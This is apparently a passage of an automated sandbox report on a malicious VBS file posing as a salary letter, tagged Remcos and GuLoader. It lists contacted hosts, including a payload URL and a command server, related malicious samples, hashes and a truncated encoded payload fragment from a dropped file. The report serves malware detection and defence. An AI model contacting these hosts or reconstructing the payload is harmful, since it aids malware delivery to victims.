                                              http://ln6b9.shop/eOYLpCyF/Paasknnelses.u32Ppowershell.exe, 00000008.00000002.1415702842.000001B5D4835000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://www.nirsoft.net/msiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmpfalse
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.1415702842.000001B5D4611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1618100382.0000000004791000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://crl.vpowershell.exe, 00000008.00000002.1447424610.000001B5ECA6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.ebuddy.commsiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  154.216.17.14
                                                  		unknownSeychelles
                                                  		135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
                                                  178.237.33.50
                                                  		geoplugin.netNetherlands
                                                  		8455ATOM86-ASATOM86NLfalse
                                                  172.67.128.117
                                                  		ln6b9.shopUnited States
                                                  		13335CLOUDFLARENETUSfalse

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1533043
                                                  Start date and time:2024-10-14 11:05:11 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 8m 4s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:44
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:Salary Increase Letter_Oct 2024.vbs
                                                  Detection:MAL
                                                  Classification:mal100.troj.expl.evad.winVBS@6100/10@2/3
                                                  EGA Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 98%
                                                  • Number of executed functions: 76
                                                  • Number of non-executed functions: 1
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .vbs

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, Sgrmuserer.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 199.232.210.172
                                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target powershell.exe, PID 5936 because it is empty
                                                  • Execution Graph export aborted for target powershell.exe, PID 6368 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: Salary Increase Letter_Oct 2024.vbs

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  05:06:04API Interceptor1x Sleep call for process: wscript.exe modified
                                                  05:06:07API Interceptor90x Sleep call for process: powershell.exe modified
                                                  05:07:31API Interceptor201781x Sleep call for process: msiexec.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  154.216.17.14Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                    Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                      178.237.33.50WC5Gv13cOQ.rtfGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      BeeaCHpaO4.exeGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsfGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • geoplugin.net/json.gp
                                                      awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • geoplugin.net/json.gp
                                                      PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      172.67.128.117Unincriminated.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                      • ln6b9.shop/TO341/index.php
                                                      cJX8BV8LYG.exeGet hashmaliciousAzorultBrowse
                                                      • ln6b9.shop/LN341/index.php
                                                      Po#70831.exeGet hashmaliciousAzorultBrowse
                                                      • ln6b9.shop/LN341/index.php

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      ln6b9.shopSalary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 104.21.2.6
                                                      Unincriminated.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                      • 172.67.128.117
                                                      cJX8BV8LYG.exeGet hashmaliciousAzorultBrowse
                                                      • 172.67.128.117
                                                      4QihT6CwD8.exeGet hashmaliciousAzorultBrowse
                                                      • 104.21.2.6
                                                      Po#70831.exeGet hashmaliciousAzorultBrowse
                                                      • 172.67.128.117
                                                      bg.microsoft.map.fastly.netDEMANDA JUICIO JUZGADO01.pdf.lnkGet hashmaliciousUnknownBrowse
                                                      • 199.232.214.172
                                                      http://search.braraildye.liveGet hashmaliciousUnknownBrowse
                                                      • 199.232.210.172
                                                      https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=selin.basaran@digiturk.com.trGet hashmaliciousUnknownBrowse
                                                      • 199.232.214.172
                                                      https://narrow-light-alley.glitch.me/public/40.htmGet hashmaliciousHTMLPhisherBrowse
                                                      • 199.232.210.172
                                                      https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=pucom@hdel.co.krGet hashmaliciousHTMLPhisherBrowse
                                                      • 199.232.210.172
                                                      https://r.clk20.com/s.ashx?ms=clk20comb:221053_100505&e=ACCOUNTING%40SBO.CO.AT&eId=72534635&c=h&url=https%3a%2f%2fwww.digikey.at%3futm_medium%3demail%26utm_source%3dcsn%26utm_campaign%3dclk20comb:221053-100505_CSN24CMM1%26utm_content%3dDigiKeyLogo_AT%26utm_cid%3d&c=E,1,HpCcAtsbpCegpKKqJ9Y5uFcA_ydFOa8bwbyPDmQPWZrYVAHSEO4EBUFk2oBVcoOSlhj1U-BBO3hqrTRAz1S8XP6noRCD2_d6D_dY_HcwfLi_OKAuOxCdCkg,&typo=1Get hashmaliciousUnknownBrowse
                                                      • 199.232.210.172
                                                      https://tracking.ei9ie7ph.com/aff_c?offer_id=14263&aff_id=2&source=testoffer&aff_sub=testofferGet hashmaliciousUnknownBrowse
                                                      • 199.232.214.172
                                                      https://itbm.egnyte.com/dl/D0z39LyNGqGet hashmaliciousUnknownBrowse
                                                      • 199.232.210.172
                                                      #U0415Sh#U0430rk.exeGet hashmaliciousRedLineBrowse
                                                      • 199.232.210.172
                                                      file.exeGet hashmaliciousLummaCBrowse
                                                      • 199.232.210.172
                                                      geoplugin.netWC5Gv13cOQ.rtfGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      BeeaCHpaO4.exeGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsfGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 178.237.33.50
                                                      awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 178.237.33.50
                                                      PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CLOUDFLARENETUSTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                      • 188.114.97.3
                                                      https://emojiparqueacuaticoo.site/NClMD/Get hashmaliciousHTMLPhisherBrowse
                                                      • 104.17.25.14
                                                      file.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.53.8
                                                      http://puzzlewood.netGet hashmaliciousUnknownBrowse
                                                      • 104.26.7.189
                                                      http://www.umb-re.comGet hashmaliciousUnknownBrowse
                                                      • 1.1.1.1
                                                      na.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 104.23.26.35
                                                      https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=selin.basaran@digiturk.com.trGet hashmaliciousUnknownBrowse
                                                      • 104.21.29.214
                                                      https://narrow-light-alley.glitch.me/public/40.htmGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.17.25.14
                                                      https://7suexjabb.cc.rs6.net/tn.jsp?f=001xE8SRwhigmS1t9Q8hharXEkJMtvyfHXyEtdChqRiKNIU6tHdVYZrXGoe4i5Oj7rJImD0z9FA9Z7Ns4_zzose6K4lQVeh2_tGOuTiXbWZeuXhaxX7ZExtB4Td1A03nBtQqSZ5QuAnpfceJlaAlK8LlVk_IFIQFC0HoZlDVtfYJ4608JDpqDknb8nuq6XfWPT8zPJXPlvUq6JBwLgT2V2rRco8OpMRVpBWXlDFx7Wa6-JLGG4j0T_z6-voVUEFkiL1LCMiOTeo2QIvK4QEL2LvJxl710RO4fN0VaMWVH9l6y0is4HN5Cx1Qqzl3DAZvvAuiLje330c-f-GdQOY-XTh1y0wrZR-jvtH8jZkGl5Vm4F_UxI-aORgSa4SEUcwRQ9lSV5NXig_pDFPkhWhUs1rJDroriPBbNmNa_eacU5P8HamXhTNKnvtjdOfUUzwPzxuQ12d4wDOvzs=&c=UsjVlbhyxWUzaXBilvRA7ixl0RUEg9wKLi4E_LzFtdA_im3u-L0cAA==&ch=uLTh3SIB3Q3_uex37lbJeSd4Xs7ZrX-qKnWJPNBj-ulohMTWcqn3qg==Get hashmaliciousUnknownBrowse
                                                      • 1.1.1.1
                                                      loader.exeGet hashmaliciousLummaCBrowse
                                                      • 172.67.140.193
                                                      ATOM86-ASATOM86NLWC5Gv13cOQ.rtfGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      BeeaCHpaO4.exeGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsfGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 178.237.33.50
                                                      awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 178.237.33.50
                                                      PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      SKHT-ASShenzhenKatherineHengTechnologyInformationCoPO-45728-10876.docGet hashmaliciousNanocoreBrowse
                                                      • 154.216.19.160
                                                      na.elfGet hashmaliciousUnknownBrowse
                                                      • 154.216.19.139
                                                      Swiftcopy.docGet hashmaliciousUnknownBrowse
                                                      • 154.216.19.160
                                                      na.elfGet hashmaliciousUnknownBrowse
                                                      • 156.241.11.89
                                                      Quote101024.docGet hashmaliciousVIP KeyloggerBrowse
                                                      • 154.216.19.160
                                                      tFuSHSz7Fv.elfGet hashmaliciousMiraiBrowse
                                                      • 156.241.11.84
                                                      2NkFwDDoDy.elfGet hashmaliciousMiraiBrowse
                                                      • 156.241.11.83
                                                      Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 154.216.17.14
                                                      MV STARSHIP AQUILA_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 154.216.18.214
                                                      4W5Y34sRmd.exeGet hashmaliciousAsyncRATBrowse
                                                      • 154.216.17.207

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                      Download File
                                                      Process:C:\Windows\System32\wscript.exe
                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                      Category:dropped
                                                      Size (bytes):71954
                                                      Entropy (8bit):7.996617769952133
                                                      Encrypted:true
                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                      Malicious:false
                                                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                      Download File
                                                      Process:C:\Windows\System32\wscript.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):328
                                                      Entropy (8bit):3.253995428229511
                                                      Encrypted:false
                                                      SSDEEP:6:kKHPNF9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:vCDImsLNkPlE99SNxAhUe/3
                                                      MD5:EF7EF2E42B495CDC20576A3DDC8619E2
                                                      SHA1:6DCA448F9C53409AC98597922F21FB059A830781
                                                      SHA-256:1EDD7F7C8A193590D906547C85AD93EEE0220D77E334F0AAB2504D578D1F8164
                                                      SHA-512:B66A1A3BDE521EDCE9F037C7BA2A71C2006404BDF9729EF0982CBB72F519186D9D5FC1D43DCA55D45F2A17AA90259EF6C281DE0247607E6FA35F588B8569F303
                                                      Malicious:false
                                                      Preview:p...... ........AI[L....(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\json[1].json

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):962
                                                      Entropy (8bit):5.013130376969173
                                                      Encrypted:false
                                                      SSDEEP:12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
                                                      MD5:F61E5CC20FBBA892FF93BFBFC9F41061
                                                      SHA1:36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
                                                      SHA-256:28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
                                                      SHA-512:5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
                                                      Malicious:false
                                                      Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):8003
                                                      Entropy (8bit):4.840877972214509
                                                      Encrypted:false
                                                      SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                      MD5:106D01F562D751E62B702803895E93E0
                                                      SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                      SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                      SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                      Malicious:false
                                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1940658735648508
                                                      Encrypted:false
                                                      SSDEEP:3:Nlllultnxj:NllU
                                                      MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                      SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                      SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                      SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                      Malicious:false
                                                      Preview:@...e................................................@..........

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1ours4x.ine.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2yeomto.dht.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jyddfzdl.pnc.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_metcihpi.1r0.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Roaming\Foregrib.ses

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):451160
                                                      Entropy (8bit):5.9606499208404164
                                                      Encrypted:false
                                                      SSDEEP:12288:WBFrzULHQaSnihS36aXMm+egeba7B8jTW3:kFrhaScsp8mCB8jTW3
                                                      MD5:3D3DBB0E90C5B97B9B63BE3573337577
                                                      SHA1:73373EF708B2A92FA3A66FBE7CA1D8D1892917A6
                                                      SHA-256:67028F4A738865DBBD967FC48EED2B3E044A284EAFF234BD79BF86E3ABBFA74D
                                                      SHA-512:35C03214E01FD725DF5232CF6228549F5F0943BCFFB78EF3D1C3F0C056CC047995EBE7AA64CA70E04A97A99F0FB43C7AEB90DACA699E71E1F9F249136DED3862
                                                      Malicious:false
                                                      Preview:cQGbcQGbuyN/DABxAZtxAZsDXCQE6wJYCnEBm7kDLsTm6wI6hnEBm4Hxfns7++sCNOTrAmbzgcGDqgDi6wL+knEBm+sCsq1xAZu6HJ8AeesCUGpxAZvrAkOtcQGbMcpxAZtxAZuJFAtxAZtxAZvR4usCZunrAvd/g8EE6wKsWnEBm4H5nWOFBXzMcQGb6wLX84tEJARxAZtxAZuJw3EBm3EBm4HDsOgvAOsCVW/rArOiui3ZA2xxAZtxAZuB8sbNmYRxAZvrAj5MgcIV62UXcQGb6wIIr+sCPUrrAiEV6wJOdXEBm4sMEOsCA6FxAZuJDBPrAr8v6wLQ70JxAZvrAg5QgfokuwQAddRxAZvrAtkWiVwkDOsC5z/rAm90ge0AAwAAcQGbcQGbi1QkCOsC3bTrAjfzi3wkBHEBm3EBm4nr6wJ6JXEBm4HDnAAAAOsCqZLrAhFKU+sClNjrAglvakBxAZvrAleqietxAZtxAZvHgwABAAAA8JQF6wImAusCLAaBwwABAADrAndxcQGbU+sCbOpxAZuJ63EBm+sCeiaJuwQBAABxAZvrAsSFgcMEAQAAcQGbcQGbU3EBm+sCOMxq/+sC34dxAZuDwgXrAlOEcQGbMfbrAsx1cQGbMclxAZtxAZuLGusCABdxAZtBcQGbcQGbORwKdfTrAgPlcQGbRnEBm+sCYgeAfAr7uHXe6wL0xusCJIeLRAr86wIpp3EBmynwcQGb6wJg8P/S6wItCesCZPa6JLsEAOsCLttxAZsxwOsCVFJxAZuLfCQM6wJXbusCBxCBNAfqTwC8cQGb6wL8kIPABOsC/TpxAZs50HXkcQGb6wIIF4n7cQGb6wIssP/XcQGbcQGbAk8AvOoUZksoQmU1D8ZFEFIuNB0mYmSFiIw1bfTnzbk+UWmHw4uL+UYaiVlTJBmnCs7BsEelDz0b04+fHnf3PQOcSZruiESx6t8j9RvL7T2GQgCutzkkgTWrorNrCw28BJGk

